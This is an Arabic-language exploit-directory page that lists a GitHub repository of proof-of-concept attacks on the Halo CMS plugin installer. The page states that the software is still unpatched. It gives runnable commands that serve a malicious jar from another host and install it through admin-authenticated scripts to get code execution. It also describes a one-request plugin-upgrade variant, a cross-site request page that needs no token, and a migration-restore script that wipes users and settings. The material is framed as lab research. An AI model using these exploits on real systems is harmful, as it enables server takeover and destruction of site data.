Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/k0nnect/halo-cve-2026-67919
الاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubk0nnect/halo-cve-2026-67919

halo-cve-2026-67919

halo cms plugin ثغرة RCE بطلب واحد من عنوان URL، مع PoC وسلسلة استغلال

عرض المستودع
11منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة RCE في إضافة halo من رابط

تتيح لوحة تحكم هالو للمشرفين تثبيت الإضافات وترقيتها بلصق رابط. فهي تجلب أي عنوان URL، تثبّت ملف jar، ويُشغَّل كود ملف jar على الخادم. لا توجد فحوصات على البروتوكول، ولا على المضيف، وتُتبع عمليات إعادة التوجيه، ويقوم مدير الإضافات بتحميل فئات الامتداد مباشرة من داخل ملف jar.

وهي cve-2026-67919 (التثبيت من URI / الترقية من URI)، وcve-2026-67920 (استعادة الترحيل)، وcve-2026-67921 (سلسلة CSRF/CORS). تم التحقق من الثلاثة جميعًا على halohub/halo:2.25.4 في مختبر docker، في أغسطس 2026. الفرع الرئيسي ما زال غير مُصحَّح.

الجزء الممتع: إنها أيضًا سلسلة تعمل من المتصفح فقط. لا تتحقق API الخاصة بلوحة التحكم من رمز XSRF، وملف تعريف ارتباط الجلسة هو samesite=none، ويعكس CORS أي أصل مصحوبًا ببيانات الاعتماد. يمكن لصفحة يزورها المشرف أن تفعل كل ذلك باستخدام fetch(). انظر exploit/csrf.html.

مختبر

root@kitploit:~
docker run -d --name halo -p 8090:8090 halohub/halo:2.25.4
# visit /system/setup once, or script it (see notes/findings.md)

قدّم ملف jar من المضيف (مرتبطًا بـ 0.0.0.0، وتصل الحاوية إلى المضيف عبر host.docker.internal):

root@kitploit:~
python3 -m http.server 8123

RCE بطلبين

ابنِ الإضافة الخبيثة (يتطلب JDK 17):

root@kitploit:~
cd plugin && sh build.sh

ثم:

root@kitploit:~
cd exploit && python3 -m pip install -r requirements.txt
./rce_install.py http://localhost:8090 admin 'Admin@12345' \
    http://host.docker.internal:8123/poc-plugin.jar

docker exec halo cat /tmp/pwned

RCE بطلب واحد

يمكن استبدال أي إضافة مثبتة مسبقًا في طلب واحد؛ كل ما يحتاجه ملف jar هو نفس metadata.name وإصدار أعلى. poc-sitemap.jar هو هذا المتغير لإضافة PluginSitemap المدمجة (1.x -> 2.0.0).

root@kitploit:~
./rce_upgrade.py http://localhost:8090 admin 'Admin@12345' \
    PluginSitemap http://host.docker.internal:8123/poc-sitemap.jar

docker exec halo cat /tmp/pwned

من المتصفح، بدون توكن

افتح exploit/csrf.html، وجّهه إلى هالو الخاص بك، ثم انقر. هذه هي سلسلة cve-2026-67921 -> cve-2026-67919: لا توجد رأس XSRF، ينتقل ملف تعريف ارتباط الجلسة عبر المواقع، ويتيح CORS قراءة الاستجابة.

من يمكنه فعل هذا

المشرف فقط، بغضّ النظر عمّا يقوله وصف CISA. المجهول يحصل على 302، والضيف على 403، والمشرف على تنفيذ تعليمات برمجية. سلسلة CSRF تجعل الأمر مثيرًا للاهتمام لأن المشرف يكون مسجّلًا بالفعل عند تشغيل الصفحة.

استعادة الترحيل (cve-2026-67920)

تستدعي عمليات الاستعادة عنوان URL عشوائيًا (بدائية جلب أخرى)، وتكتب مجلد workdir/ من ملف zip إلى دليل عمل هالو دون تنظيف، وتستبدل مخزن الإضافات بالكامل بمحتويات النسخة الاحتياطية. ملف extensions.data فارغ يمسح المستخدمين وربطات الأدوار والإعدادات. استخدم exploit/migration_restore.py على جهاز مؤقت فقط.

ما يوجد هنا

root@kitploit:~
exploit/   login.py, rce_install.py, rce_upgrade.py,
           migration_restore.py, csrf.html
plugin/    plugin.yaml, Exploit.java, plugin-components.idx,
           build.sh, prebuilt jars
notes/     findings.md (privilege ladder, fetcher behavior,
           cookie/cors details, fix status)

بالنسبة لمتغير الطلب الواحد، عدّل plugin/plugin.yaml (metadata.name + الإصدار) وأعد البناء؛ أو استخدم poc-sitemap.jar المبني مسبقًا مع هالو مثبت عليه PluginSitemap.

إخلاء مسؤولية: للبحث على أنظمة تملكها. استعادة الترحيل بشكل خاص ستدمّر المثيل الذي تعمل ضده.

شكر وتقدير

chris jagdeo (k0nnect)

تنزيل الأداة